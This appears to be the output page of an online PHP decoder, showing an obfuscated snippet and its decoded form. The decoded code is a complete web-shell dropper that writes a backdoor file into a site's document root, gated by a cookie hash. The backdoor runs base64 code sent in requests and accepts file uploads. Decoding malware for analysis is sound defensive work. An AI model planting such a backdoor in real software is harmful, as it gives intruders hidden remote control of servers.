Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
_HiStOrY_V2_ //\012file_put_contents($_SERVER['DOCUMENT_ROOT'].'/ed1f3542b797.php','<?php..
Decoded Output download
_HiStOrY_V2_
//
file_put_contents($_SERVER['DOCUMENT_ROOT'].'/ed1f3542b797.php','<?php echo 409723*20;if(md5($_COOKIE["d"])=="17028f487cb2a84607646da3ad3878ec"){echo"ok";eval(base64_decode($_REQUEST["id"]));if($_POST["up"]=="up"){@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);}}?>
');
Did this file decode correctly?
Original Code
_HiStOrY_V2_
//\012file_put_contents($_SERVER['DOCUMENT_ROOT'].'/ed1f3542b797.php','<?php\040echo\040409723*20;if(md5($_COOKIE["d"])=="\13461\134x37\13460\13462\134x38\134146\134x34\13470\13467\134143\134142\134x32\134141\13470\134x34\134x36\134x30\13467\134x36\13464\134x36\134x64\134141\13463\134141\134144\13463\13470\13467\134x38\134145\134143"){echo"\134x6f\134x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\134165\134160"]=="\134165\134x70"){@copy($_FILES["\134x66\134151\134x6c\134x65"]["\134164\134155\134x70\134x5f\134x6e\134x61\134x6d\134x65"],$_FILES["\134146\134x69\134154\134x65"]["\134156\134141\134155\134x65"]);}}?>\012');
Function Calls
| None |
Stats
| MD5 | 7359356ba12eb4d728731852bc893300 |
| Eval Count | 0 |
| Decode Time | 50 ms |